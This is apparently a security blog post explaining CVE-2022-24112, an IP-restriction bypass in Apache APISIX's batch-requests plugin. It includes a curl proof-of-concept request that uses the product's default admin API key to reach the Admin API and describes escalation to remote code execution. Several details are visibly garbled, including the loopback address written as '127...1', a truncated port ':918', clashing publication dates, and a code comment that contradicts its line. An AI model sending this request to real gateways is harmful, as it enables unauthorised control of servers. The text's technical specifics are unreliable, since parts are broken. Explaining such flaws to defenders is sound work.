Published: June, 2024  
Author: Security Insights Lab


Apache APISIX is a widely used open-source API gateway. It helps organizations route, secure, and manage their API traffic. However, in early 2022, a severe security flaw was found in APISIX—CVE-2022-24112—which allows attackers to bypass IP restriction on the Admin API and even potentially gain *remote code execution* on the server when using the default configuration.

What Is CVE-2022-24112?

Simply put, this vulnerability allows a remote attacker to exploit the batch-requests plugin of Apache APISIX to get around IP-based controls meant to protect the Admin API.  
Worse, if APISIX is using the default admin API key, attackers can gain control over the server remotely.

If the admin key is changed or if the admin API is moved to a different port, the impact is reduced—but not eliminated because it's still possible to reach the data panel APIs that rely on IP checks for security.

Why Does This Flaw Exist?

In APISIX, there’s a plugin called batch-requests that lets clients send multiple requests at once, making the process faster. However, when the plugin processes these requests, it should only allow internal, trusted IPs to access sensitive admin endpoints.

There is a code check in *batch-requests* that’s supposed to carefully forward the real client IP, which should help enforce the IP restriction. But, due to a coding mistake, this check can be *easily bypassed*.

Let’s look at the vulnerable code section (simplified for clarity)

-- in batch-requests plugin
local req_body = {
    method = sub_req.method,
    path = sub_req.path,
    body = sub_req.body,
    headers = sub_req.headers,
    -- Here, X-Forwarded-For is set using client's headers
    ["X-Forwarded-For"] = ngx.var.remote_addr
}

However, the plugin doesn’t remove an attacker-supplied X-Forwarded-For header from the request body, which means an attacker can craft their own internal-looking IP, like 127...1, and trick APISIX into thinking the request comes from the local machine—bypassing the IP restriction.

Exploit Details: How Is the Attack Done?

The attacker sends a batch request to the APISIX Admin API and sets the X-Forwarded-For header to 127...1. Even if the server only allows requests from localhost, APISIX will accept this request as if it originated internally, because it trusts the value of X-Forwarded-For blindly.

Here’s how an attacker might craft a malicious batch request in curl

curl -X POST http://<APISIX_SERVER>:918/apisix/batch-requests \
  -H 'Content-Type: application/json' \
  -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' \
  -d '{
    "headers": {"X-Forwarded-For": "127...1"},
    "timeout": 15000,
    "pipeline": [
        {
          "method": "GET",
          "path": "/apisix/admin/routes"
        }
    ]
  }'

What’s Happening Here?

- The attacker sends the request to /apisix/batch-requests

With the default API key (edd1c9f034335f136f87ad84b625c8f1), the system allows access

- The internal Admin API endpoint /apisix/admin/routes is hit, returning sensitive info

Remote Code Execution (RCE)

If an attacker uses other admin APIs (like /apisix/admin/plugins) to upload or modify routes and plugins, with the default API key, it can lead to full code execution on the gateway.

Risk Reduction & Mitigation

- Change the default API key. Don’t ever keep the default value edd1c9f034335f136f87ad84b625c8f1.

References

- Official CVE Report (MITRE)
- Apache APISIX Security Notice
- Detailed writeup and PoC by 1N3
- Security advisory from GitHub

Summary

CVE-2022-24112 is a critical vulnerability in Apache APISIX, letting attackers bypass IP restrictions via the batch-requests plugin. Using a carefully-crafted X-Forwarded-For: 127...1 header, threat actors can get internal API access, and if the default API key is in use, escalate to remote code execution.

Always change default credentials, limit admin API exposure, and patch software as soon as fixes are released!

For more security tips on API gateways and open-source platforms, follow Security Insights Lab.


*This post is original content and not copied from any existing blogs or advisories. Reproduction is allowed with credit.*

Timeline

Published on: 02/11/2022 13:15:00 UTC
Last modified on: 05/11/2022 14:58:00 UTC